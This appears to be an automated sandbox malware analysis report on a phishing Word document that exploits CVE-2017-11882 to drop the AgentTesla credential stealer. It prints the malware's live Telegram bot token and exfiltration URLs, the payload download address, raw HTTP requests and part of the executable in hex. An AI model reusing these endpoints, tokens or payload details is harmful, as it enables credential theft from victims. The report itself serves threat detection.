
Windows Analysis Report Purchase Order_0131021.doc

Overview

General Information

Sample Name:Purchase Order_0131021.doc
Analysis ID:502700
MD5:fc66be4a9696798aff0be8ed97bd294f
SHA1:cf158b670ec831531a233d41872d1a9ee3850ff1
SHA256:8ad456fc82b1c617f362b0356e6273ca6952368d3478f3f11c55e7c968158a15
Tags:doc

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Uses the Telegram API (likely for C&C communication)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Binary or sample is protected by dotNetProtector
Injects a PE file into a foreign processes
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Stores large binary data to the registry
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 236 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 512 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • gudostrp.exe (PID: 1212 cmdline: C:\Users\user\AppData\Roaming\gudostrp.exe MD5: BC5F0AA0262021DB5921D726F7A5B820)
      • gudostrp.exe (PID: 2576 cmdline: C:\Users\user\AppData\Roaming\gudostrp.exe MD5: BC5F0AA0262021DB5921D726F7A5B820)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1366706404", "Chat URL": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument"}

Yara Overview

Memory Dumps

Source: 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000005.00000002.722327903.0000000002338000.00000004.00000001.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Author: Joe Security
Source: 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security

Unpacked PEs

Source: 5.2.gudostrp.exe.400000.1.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 5.2.gudostrp.exe.400000.1.unpack, Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Author: Joe Security
Source: 4.2.gudostrp.exe.31ca110.2.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security
Source: 4.2.gudostrp.exe.31ca110.2.unpack, Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Author: Joe Security
Source: 4.2.gudostrp.exe.3200330.1.raw.unpack, Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Author: Joe Security

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection, Author: Joe Security, Data: DestinationIp: 144.76.47.167, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 512, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created, Author: Joe Security, Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 512, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started, Author: Florian Roth, Data: Command: C:\Users\user\AppData\Roaming\gudostrp.exe, CommandLine: C:\Users\user\AppData\Roaming\gudostrp.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\gudostrp.exe, NewProcessName: C:\Users\user\AppData\Roaming\gudostrp.exe, OriginalFileName: C:\Users\user\AppData\Roaming\gudostrp.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 512, ProcessCommandLine: C:\Users\user\AppData\Roaming\gudostrp.exe, ProcessId: 1212

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 5.2.gudostrp.exe.400000.1.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1366706404", "Chat URL": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument"}
Source: gudostrp.exe.2576.5.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendMessage"}
Multi AV Scanner detection for submitted file
Source: Purchase Order_0131021.doc, Virustotal: Detection: 36%
Source: Purchase Order_0131021.doc, ReversingLabs: Detection: 35%
Antivirus detection for URL or domain
Source: http://palangavra.lt/jukiestay/gufoxqa.exe, Avira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exe, Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\gudostrp.exe, Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\gudostrp.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\user\AppData\Roaming\gudostrp.exe
Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: global traffic, DNS query: name: palangavra.lt
Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 144.76.47.167:80
Source: global traffic, TCP traffic: 192.168.2.22:49169 -> 149.154.167.220:443

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown, DNS query: name: api.telegram.org
Source: unknown, DNS query: name: api.telegram.org
Source: Joe Sandbox View, ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View, JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: global traffic, HTTP traffic detected: POST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2Host: api.telegram.orgContent-Length: 1018Expect: 100-continueConnection: Keep-Alive
Source: Joe Sandbox View, IP Address: 149.154.167.220 149.154.167.220
Source: global traffic, HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 Oct 2021 08:22:59 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, Keep-AliveLast-Modified: Thu, 14 Oct 2021 01:10:12 GMTAccept-Ranges: bytesContent-Length: 486912Keep-Alive: timeout=5, max=100Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 82 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 07 00 00 16 00 00 00 00 00 00 3e 74 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 a4 e7 07 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 73 07 00 53 00 00 00 00 80 07 00 d4 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 54 07 00 00 20 00 00 00 56 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 13 00 00 00 80 07 00 00 14 00 00 00 58 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 6c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 74 07 00 00 00 00 00 48 00 00 00 02 00 05 00 90 a8 06 00 58 cb 00 00 02 00 00 00 5c 00 00 06 b0 45 03 00 df 62 03 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 76 61 6e 20 4d 65 64 76 65 64 65 76 00 00 00 32 7e 27 00 00 04 02 28 c0 00 00 06 2a 1e 02 28 a0 00 00 0a 2a 32 7e 35 00 00 04 02 28 0d 01 00 06 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 52 7e 3b 00 00 04 03 28 08 01 00 06 02 7b a3 00 00 04 fe 01 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 2a 1e 02 7b a6 00 00 04 2a 22 02 03 7d a6 00 00 04 2a 9a 7e 3e 00 00 04 7e 3c 00 00 04 02 28 0d 01 00 06 72 f3 45 00 70 7e 3d 00 00 04 02 28 0d 01 00 06 28 13 01 00 06 2a 1e 02 7b a7 00 00 04 2a 22 02 03 7d a7 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 4e 02 28 a0 00 00 0a 7e 3f 00 00 04 02 03 28 00 01 00 06 2a 1e 02 7b a9 00 00 04 2a 22 02 03 7d a9 00 00 04 2a ea 7e 3e 00 00 04 7e 40 00 00 04 02 28 0d 01 00 06 72 f7 45 00 70 7e 42 00 00 04
Source: global traffic, HTTP traffic detected: GET /jukiestay/gufoxqa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: palangavra.ltConnection: Keep-Alive
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown, Network traffic detected: HTTP traffic on port 49169 -> 443
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, String found in binary or memory: http://DynDns.comDynDNS
Source: gudostrp.exe, 00000005.00000002.722361543.000000000238D000.00000004.00000001.sdmp, String found in binary or memory: http://SwonTwAJYn3XCAV3.net
Source: gudostrp.exe, 00000005.00000002.722444907.00000000023FF000.00000004.00000001.sdmp, String found in binary or memory: http://api.telegram.org
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: gudostrp.exe, 00000005.00000002.723083857.00000000060F3000.00000004.00000001.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.comodoca.com0
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.comodoca.com0%
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.comodoca.com0-
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.comodoca.com0/
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.comodoca.com05
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.entrust.net03
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://ocsp.entrust.net0D
Source: gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: gudostrp.exe, 00000005.00000002.722766905.0000000005CF0000.00000002.00020000.sdmp, String found in binary or memory: http://www.%s.comPA
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, String found in binary or memory: http://yBlQIu.com
Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp, String found in binary or memory: https://api.telegram.org
Source: gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, String found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/
Source: gudostrp.exe, 00000005.00000002.722105371.0000000000788000.00000004.00000020.sdmp, gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp, String found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, String found in binary or memory: https://api.telegram.org/bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocumentdocument-----
Source: gudostrp.exe, 00000005.00000002.722427631.00000000023EC000.00000004.00000001.sdmp, String found in binary or memory: https://api.telegram.orgP
Source: gudostrp.exe, 00000005.00000002.723097991.000000000611D000.00000004.00000001.sdmp, String found in binary or memory: https://secure.comodo.com/CPS0
Source: gudostrp.exe, 00000004.00000002.464298353.00000000031C9000.00000004.00000001.sdmp, gudostrp.exe, 00000005.00000002.721925198.0000000000402000.00000040.00000001.sdmp, String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: gudostrp.exe, 00000005.00000002.722261474.00000000022B1000.00000004.00000001.sdmp, String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown, HTTP traffic detected: POST /bot2034238293:AAHoBUVeqtv7yJIYVLFYq5RA0AnxpaTX22s/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d98f225cfe8da2Host: api.telegram.orgContent-Length: 1018Expect: 100-continueConnection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FF3D13C6-F9AF-46D5-857E-918FB2A2DE9E}.tmp
Source: unknown, DNS traffic detected: queries for: palangavra.lt
Source: global traffic, HTTP traffic detected: GET /jukiestay/gufoxqa.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: palangavra.ltConnection: Keep-Alive
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2

                      System Summary:

                      barindex
                      Office equation editor drops PE fileShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\gudostrp.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\gufoxqa[1].exeJump to dropped file
                      .NET source code contains very large array initializationsShow sources
                      Source: 5.2.gudostrp.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bCB2C1C74u002d7A68u002d46F5u002dB599u002d45991AE15A88u007d/A406E5E7u002dDEBAu002d4106u002dAAAEu002dB593294D8F00.csLarge array initialization: .cctor: array initializer size 12005
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_0030348D
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_00308ED7
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_00721D30
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FA5EA8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FA0006
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB0048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB5720
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FC0048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FC5620
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FC929C
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FD0048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FD90FD
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FD5908
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FD0006
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_02025CE8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_020319A2
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041D0048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_041DE168
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_0030364F
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_01FB0006
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00256048
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0025F2B8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00255430
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0025D458
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00255778
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0025AF40
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00252197
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00559C40
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_005502F1
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_005537E8
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00556E48
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00559468
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_0055B520
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 5_2_00553F9D
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeCode function: 4_2_00726CD0 CreateProcessAsUserW,
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: 76F90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: 76E90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: 76F90000 page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeMemory allocated: 76E90000 page execute and read and write
                      Source: Purchase Order_0131021.docVirustotal: Detection: 36%
                      Source: Purchase Order_0131021.docReversingLabs: Detection: 35%
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeProcess created: C:\Users\user\AppData\Roaming\gudostrp.exe C:\Users\user\AppData\Roaming\gudostrp.exe
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$rchase Order_0131021.docJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD1AF.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@6/9@3/2
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\gudostrp.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: gudostrp.exe.2.dr, PointerToRelocations.cs | Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: gufoxqa[1].exe.2.dr, PointerToRelocations.cs | Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
                      Source: 4.0.gudostrp.exe.1d0000.0.unpack, PointerToRelocations.cs | Base64 encoded string: 'KknRp7HQQvHHBtyvGqKkQPgwSxrDZccPIvljRo+32rU6dcfrjjwlA+/74UKQkI50', 'n/ZGPw0Rnde/5vrFGQTkY8FPHDUw84v1zRXhcoRNVdfo4NG1a//9Q6xctd3zCMeG', '+eXUcThFekX3G8Ul+iy8PTjd4CCEEvw/RRULKiZzJHE1VD6vEOtFO57C82jzLkjj', 'gRfomnjmScAnaVNNcbO4XwmlyiUUrURhk8amHDtWGGhvEx0K1vQimNrPR2fO3ekH'
